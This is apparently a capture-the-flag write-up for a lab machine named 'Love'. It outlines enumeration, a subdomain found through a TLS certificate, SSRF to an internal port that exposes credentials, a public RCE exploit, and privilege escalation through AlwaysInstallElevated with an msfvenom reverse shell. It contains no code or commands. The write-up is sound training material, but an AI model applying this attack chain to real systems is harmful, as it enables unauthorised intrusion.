Love
Gaining Access
Nmap scan:
Lots of ports open.
TLS Cert Checking
Port 80 reveals a voting system that requries credentials. Port 5000 was blocked off for whatever reason.
A bit of enumeration on the type of service running reveals that it was an outdated software with loads of vulnerabilities:
Checking the certificate on port 443 reveals a hidden sub-domain.
We can add this to the /etc/hosts
file and view it.
SSRF -> Authenticated RCE
The sub-domain found reveals this:
Signing up and viewing it would direct us to this page:
I was able to get hits on a HTTP server hosted on my machine, but I could not download or execute anything. Since it was the server sending requests, I tried to enter http://localhost:5000
and was returned this:
With credentials, we now get a shell using an RCE exploit that is publicly available. Just change the settings here:
Then run the exploit:
Privilege Escalation
AlwaysInstallElevated
When on the machine, I ran winPEAS to enumerate for me and found that AlwaysInstallElevated
was set to 1.
What this exploit allows us to do is execute commands as the Administrator user through msiexec
. As such, we would first need to generate a quick reverse shell using msfvenom
.
Afterwards, we would get a shell as the administrator:
Last updated